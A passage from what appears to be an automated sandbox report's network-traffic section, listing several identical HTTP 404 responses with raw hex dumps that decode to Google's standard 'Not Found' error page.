65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:30 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:35 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:38 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
